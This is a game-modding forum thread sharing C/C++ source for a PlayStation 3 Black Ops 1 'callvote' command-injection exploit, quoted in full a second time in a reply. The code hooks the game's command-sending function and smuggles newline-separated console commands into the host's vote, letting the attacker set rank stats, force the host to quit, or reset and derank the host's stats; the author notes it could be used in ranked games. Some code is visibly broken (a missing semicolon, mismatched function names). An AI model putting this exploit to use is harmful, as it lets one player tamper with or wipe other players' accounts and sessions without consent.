Post: Bo1 Non-Host Infection A.K.A. CallVote Exploit
If all clients' stats aren't released, here's the alternative =D


    
/*Bo1 Nonhost Infection A.K.A. CallVote Exploit
Credits:
https://old.zenhax.com/quake3-engine-callvote-bug-t686.html

Luigi for documenting Quake 3 callvote Exploite
01cedricv2 for showing Quake documentation to Jo-Milk
and Jo-Milk for porting to PS3

This can be ported on Bo2 [Tested] and Other cods
This infects the host once Vote passes to do so
you need to join your friend in a private match
He'll need to be the host:
1st way is:
you tell him to go spectator and you spawn in and use cbuf_AddText
2nd way is:Everyone leaves or go spectator [Besides the host] to infect the host

this exploit on ps3 is hard to use online my main use of this is to prestige my friends without going on their accounts but if you where to have a few jailbreaks you could bind a button cmd vote yes and push the call vote on a ranked game
*/

// TOC pointer for the game build the author labels 1.13. This and the entry address in cbuf[]
// below are build-specific; they are only meaningful for that exact executable.
#define TOC 0x0072DCE8//1.13
int var = 1;//change this value to change the infection type
// Payload selector read by the switch in MSG_WriteReliableCommand_Hook: 0, 1 or 2 picks one of
// its hard-coded strings, any other value forwards the original command unchanged.

int cbuf[] = { 0x00399CC8, TOC };
// {entry address, TOC} pair cast to a function pointer — presumably a hand-built PPC64 function
// descriptor for the game's own Cbuf_AddText; TODO confirm 0x00399CC8 belongs to the same build as TOC.
void(*CBuf_AddText)(int client, char* cmd) = (void(*)(int, char*))&cbuf;

// Intentionally empty trampoline. HookFunctionStart (below) overwrites the first 0x20 bytes of this
// function with the four original instructions of the hooked function followed by a jump back to
// the fifth, so the body only has to reserve enough space; the seven nops are presumably what keeps
// the compiler from emitting a shorter body — TODO confirm on the target toolchain.
// Until the hook is installed, calling it does nothing and returns.
void MSG_WriteReliableCommand_HookStub(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos) {
__nop();
__nop();
__nop();
__nop();
__nop();
__nop();
__nop();
}

/*
 * Replacement installed over the game's MSG_WriteReliableCommand (see the HookFunctionStart call at
 * the bottom of the listing). Every outgoing reliable command is routed through here; only the exact
 * marker "callvote map mp_nuked;Jo-Milk" — the string CBuf_AddText is asked to queue further down —
 * is swapped for the payload selected by `var`. Everything else, and any unknown `var`, is forwarded
 * untouched through the stub, which by then holds the original function's first instructions plus a
 * jump back.
 *
 * Why it works, per the author's note below and the Quake 3 callvote bug credited at the top: the
 * vote argument is not sanitised on the receiving side, so an embedded '\n' acts as a command
 * separator and the text after it runs as further console commands on the host. The defensive fix
 * belongs on the host/server side — reject or escape '\n', ';' and other control characters in vote
 * strings before they reach the command buffer, and never execute vote text as commands at all.
 *
 * pszCommand is passed straight to strcmp with no null check; if the engine can ever hand over a null
 * command this dereferences it — TODO confirm the caller's contract.
 */
void MSG_WriteReliableCommand_Hook(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos)
{
if (strcmp(pszCommand, "callvote map mp_nuked;Jo-Milk") == 0)//if dont work try pszBuffer
{
switch (var)
{
case 0:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nbind button_back say ^1hacked by ^2Jo-Milk ^1Visit ^5www.youtube.com/c/JoMilk15MoDz for More\nstatsetbyname RANK 50\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//RANK 50 not fully done
case 1:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nquit\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//kick host to XMB
case 2:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nresetStats\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//Derank
default:MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;// pass-through for any unknown selector
}

}
else
{
MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos);
}
}
/*basically we replaced ';' by '\n' in the hook making the host execute the whole line of dvars instead of one
but in cbuf_AddText you want ';' to avoid the game from executing the line of dvars on yourself*/

/*Call this somewhere outside of the MSG_WriteReliableCommand_Hook*/
// Queues the marker command that MSG_WriteReliableCommand_Hook recognises and rewrites. It is a
// statement, so it has to run from inside a function, not at file scope as pasted here.
cBuf_Addtext(0, "cmd callvote map \"mp_nuked;Jo-Milk\"\n");

/*--------------------------------------------------Extra----------------------------------------------------------------------*/
//read write syscalls
// Reads `size` bytes of the current process's memory at `address` into `data` via syscall 904.
// `system_call_4`, `sys_process_getpid` and `return_to_user_prog` are PS3 SDK macros/functions that are
// not defined on this page; the return is presumably the syscall's status. Nothing here validates
// `data` or `size` — the caller must supply a buffer of at least `size` bytes.
int32_t sys_dbg_read_process_memory(uint64_t address, void *data, size_t size)
{
system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
return_to_user_prog(int32_t);
}

// Typed convenience wrapper over sys_dbg_read_process_memory.
// Defect: `data` is taken by value, so the syscall fills a local copy that is discarded on return and
// the caller never receives the bytes that were read — only the status code is meaningful as written.
// (Unused by the listing above, which calls sys_dbg_read_process_memory directly.)
template<typename T>
int32_t ReadProcessMemory(uint32_t address, T data, size_t size)
{
return sys_dbg_read_process_memory(address, &data, size);
}

// Writes `size` bytes from `data` into the current process's memory at `address` via syscall 905.
// Same SDK macros as the read wrapper above; the return is presumably the syscall's status, and no
// argument is validated here.
int32_t sys_dbg_write_process_memory(uint64_t address, const void *data, size_t size)
{
system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
return_to_user_prog(int32_t);
}

// Typed convenience wrapper: writes the bytes of a local copy of `value` to `address`.
// `size` must not exceed sizeof(T) — a larger size reads past the local copy.
// (Unused by the listing above, which calls sys_dbg_write_process_memory directly.)
template<typename T>
int32_t WriteProcessMemory(uint32_t address, const T value, size_t size)
{
return sys_dbg_write_process_memory(address, &value, size);
}

/*
 * Installs a detour. The first 0x10 bytes (four PowerPC instructions) at functionStartAddress are
 * copied into the stub function, followed by an absolute jump back to functionStartAddress + 0x10;
 * the original entry is then overwritten with an absolute jump to newFunction. Both jumps use the
 * sequence lis r11 / ori r11,r11 / mtctr r11 / bctr (0x3D600000, 0x616B0000, 0x7D6903A6,
 * 0x4E800420), so the stub needs at least 0x20 bytes of body and the target at least 0x10.
 *
 * Assumptions not verified here: the four relocated instructions are position-independent (a
 * relative branch among them would break once moved), the syscalls succeed (their status is
 * ignored), and the target region is writable.
 */
void HookFunctionStart(uint32_t functionStartAddress, uint32_t newFunction, uint32_t functionStub)
{
uint32_t normalFunctionStub[8], hookFunctionStub[4];
// save the original prologue: words 0..3
sys_dbg_read_process_memory(functionStartAddress, normalFunctionStub, 0x10);
// words 4..7: jump back to the instruction after the saved prologue
normalFunctionStub[4] = 0x3D600000 + ((functionStartAddress + 0x10 >> 16) & 0xFFFF);
normalFunctionStub[5] = 0x616B0000 + (functionStartAddress + 0x10 & 0xFFFF);
normalFunctionStub[6] = 0x7D6903A6;
normalFunctionStub[7] = 0x4E800420;
sys_dbg_write_process_memory(functionStub, normalFunctionStub, 0x20);
// replace the target's prologue with a jump to newFunction
hookFunctionStub[0] = 0x3D600000 + ((newFunction >> 16) & 0xFFFF);
hookFunctionStub[1] = 0x616B0000 + (newFunction & 0xFFFF);
hookFunctionStub[2] = 0x7D6903A6;
hookFunctionStub[3] = 0x4E800420
sys_dbg_write_process_memory(functionStartAddress, hookFunctionStub, 0x10);
}

// Installs the detour at 0x3CCAF8 (build-specific, see TOC). `*(uint32_t*)fn` reads the first word
// of what each function pointer refers to — presumably the entry address of a PPC64 function
// descriptor rather than the code itself; TODO confirm for this toolchain. Like the CBuf_AddText
// call above, this is a statement and must run from inside a function.
HookFunctionStart(0x3CCAF8, *(uint32_t*)MSG_WriteReliableCommand_Hook, *(uint32_t*)MSG_WriteReliableCommand_HookStub);







PLEASE keep the credits as they are

Niceeeeeeeeeee Happy
Originally posted by JM
If all clients' stats aren't released, here's the alternative =D


    
/*Bo1 Nonhost Infection A.K.A. CallVote Exploit
Credits:
https://old.zenhax.com/quake3-engine-callvote-bug-t686.html

Luigi for documenting Quake 3 callvote Exploite
01cedricv2 for showing Quake documentation to Jo-Milk
and Jo-Milk for porting to PS3

This can be ported on Bo2 [Tested] and Other cods
This infects the host once Vote passes to do so
you need to join your friend in a private match
He'll need to be the host:
1st way is:
you tell him to go spectator and you spawn in and use cbuf_AddText
2nd way is:Everyone leaves or go spectator [Besides the host] to infect the host

this exploit on ps3 is hard to use online my main use of this is to prestige my friends without going on their accounts but if you where to have a few jailbreaks you could bind a button cmd vote yes and push the call vote on a ranked game
*/

// TOC pointer for the game build the author labels 1.13. This and the entry address in cbuf[]
// below are build-specific; they are only meaningful for that exact executable.
#define TOC 0x0072DCE8//1.13
int var = 1;//change this value to change the infection type
// Payload selector read by the switch in MSG_WriteReliableCommand_Hook: 0, 1 or 2 picks one of
// its hard-coded strings, any other value forwards the original command unchanged.

int cbuf[] = { 0x00399CC8, TOC };
// {entry address, TOC} pair cast to a function pointer — presumably a hand-built PPC64 function
// descriptor for the game's own Cbuf_AddText; TODO confirm 0x00399CC8 belongs to the same build as TOC.
void(*CBuf_AddText)(int client, char* cmd) = (void(*)(int, char*))&cbuf;

// Intentionally empty trampoline. HookFunctionStart (below) overwrites the first 0x20 bytes of this
// function with the four original instructions of the hooked function followed by a jump back to
// the fifth, so the body only has to reserve enough space; the seven nops are presumably what keeps
// the compiler from emitting a shorter body — TODO confirm on the target toolchain.
// Until the hook is installed, calling it does nothing and returns.
void MSG_WriteReliableCommand_HookStub(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos) {
__nop();
__nop();
__nop();
__nop();
__nop();
__nop();
__nop();
}

/*
 * Replacement installed over the game's MSG_WriteReliableCommand (see the HookFunctionStart call at
 * the bottom of the listing). Every outgoing reliable command is routed through here; only the exact
 * marker "callvote map mp_nuked;Jo-Milk" — the string CBuf_AddText is asked to queue further down —
 * is swapped for the payload selected by `var`. Everything else, and any unknown `var`, is forwarded
 * untouched through the stub, which by then holds the original function's first instructions plus a
 * jump back.
 *
 * Why it works, per the author's note below and the Quake 3 callvote bug credited at the top: the
 * vote argument is not sanitised on the receiving side, so an embedded '\n' acts as a command
 * separator and the text after it runs as further console commands on the host. The defensive fix
 * belongs on the host/server side — reject or escape '\n', ';' and other control characters in vote
 * strings before they reach the command buffer, and never execute vote text as commands at all.
 *
 * pszCommand is passed straight to strcmp with no null check; if the engine can ever hand over a null
 * command this dereferences it — TODO confirm the caller's contract.
 */
void MSG_WriteReliableCommand_Hook(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos)
{
if (strcmp(pszCommand, "callvote map mp_nuked;Jo-Milk") == 0)//if dont work try pszBuffer
{
switch (var)
{
case 0:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nbind button_back say ^1hacked by ^2Jo-Milk ^1Visit ^5www.youtube.com/c/JoMilk15MoDz for More\nstatsetbyname RANK 50\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//RANK 50 not fully done
case 1:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nquit\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//kick host to XMB
case 2:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nresetStats\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//Derank
default:MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;// pass-through for any unknown selector
}

}
else
{
MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos);
}
}
/*basically we replaced ';' by '\n' in the hook making the host execute the whole line of dvars instead of one
but in cbuf_AddText you want ';' to avoid the game from executing the line of dvars on yourself*/

/*Call this somewhere outside of the MSG_WriteReliableCommand_Hook*/
// Queues the marker command that MSG_WriteReliableCommand_Hook recognises and rewrites. It is a
// statement, so it has to run from inside a function, not at file scope as pasted here.
cBuf_Addtext(0, "cmd callvote map \"mp_nuked;Jo-Milk\"\n");

/*--------------------------------------------------Extra----------------------------------------------------------------------*/
//read write syscalls
// Reads `size` bytes of the current process's memory at `address` into `data` via syscall 904.
// `system_call_4`, `sys_process_getpid` and `return_to_user_prog` are PS3 SDK macros/functions that are
// not defined on this page; the return is presumably the syscall's status. Nothing here validates
// `data` or `size` — the caller must supply a buffer of at least `size` bytes.
int32_t sys_dbg_read_process_memory(uint64_t address, void *data, size_t size)
{
system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
return_to_user_prog(int32_t);
}

// Typed convenience wrapper over sys_dbg_read_process_memory.
// Defect: `data` is taken by value, so the syscall fills a local copy that is discarded on return and
// the caller never receives the bytes that were read — only the status code is meaningful as written.
// (Unused by the listing above, which calls sys_dbg_read_process_memory directly.)
template<typename T>
int32_t ReadProcessMemory(uint32_t address, T data, size_t size)
{
return sys_dbg_read_process_memory(address, &data, size);
}

// Writes `size` bytes from `data` into the current process's memory at `address` via syscall 905.
// Same SDK macros as the read wrapper above; the return is presumably the syscall's status, and no
// argument is validated here.
int32_t sys_dbg_write_process_memory(uint64_t address, const void *data, size_t size)
{
system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
return_to_user_prog(int32_t);
}

// Typed convenience wrapper: writes the bytes of a local copy of `value` to `address`.
// `size` must not exceed sizeof(T) — a larger size reads past the local copy.
// (Unused by the listing above, which calls sys_dbg_write_process_memory directly.)
template<typename T>
int32_t WriteProcessMemory(uint32_t address, const T value, size_t size)
{
return sys_dbg_write_process_memory(address, &value, size);
}

/*
 * Installs a detour. The first 0x10 bytes (four PowerPC instructions) at functionStartAddress are
 * copied into the stub function, followed by an absolute jump back to functionStartAddress + 0x10;
 * the original entry is then overwritten with an absolute jump to newFunction. Both jumps use the
 * sequence lis r11 / ori r11,r11 / mtctr r11 / bctr (0x3D600000, 0x616B0000, 0x7D6903A6,
 * 0x4E800420), so the stub needs at least 0x20 bytes of body and the target at least 0x10.
 *
 * Assumptions not verified here: the four relocated instructions are position-independent (a
 * relative branch among them would break once moved), the syscalls succeed (their status is
 * ignored), and the target region is writable.
 */
void HookFunctionStart(uint32_t functionStartAddress, uint32_t newFunction, uint32_t functionStub)
{
uint32_t normalFunctionStub[8], hookFunctionStub[4];
// save the original prologue: words 0..3
sys_dbg_read_process_memory(functionStartAddress, normalFunctionStub, 0x10);
// words 4..7: jump back to the instruction after the saved prologue
normalFunctionStub[4] = 0x3D600000 + ((functionStartAddress + 0x10 >> 16) & 0xFFFF);
normalFunctionStub[5] = 0x616B0000 + (functionStartAddress + 0x10 & 0xFFFF);
normalFunctionStub[6] = 0x7D6903A6;
normalFunctionStub[7] = 0x4E800420;
sys_dbg_write_process_memory(functionStub, normalFunctionStub, 0x20);
// replace the target's prologue with a jump to newFunction
hookFunctionStub[0] = 0x3D600000 + ((newFunction >> 16) & 0xFFFF);
hookFunctionStub[1] = 0x616B0000 + (newFunction & 0xFFFF);
hookFunctionStub[2] = 0x7D6903A6;
hookFunctionStub[3] = 0x4E800420
sys_dbg_write_process_memory(functionStartAddress, hookFunctionStub, 0x10);
}

// Installs the detour at 0x3CCAF8 (build-specific, see TOC). `*(uint32_t*)fn` reads the first word
// of what each function pointer refers to — presumably the entry address of a PPC64 function
// descriptor rather than the code itself; TODO confirm for this toolchain. Like the CBuf_AddText
// call above, this is a statement and must run from inside a function.
HookFunctionStart(0x3CCAF8, *(uint32_t*)MSG_WriteReliableCommand_Hook, *(uint32_t*)MSG_WriteReliableCommand_HookStub);







PLEASE keep the credits as they are


Reported haxor nub. Jokes good work bish Winky Winky
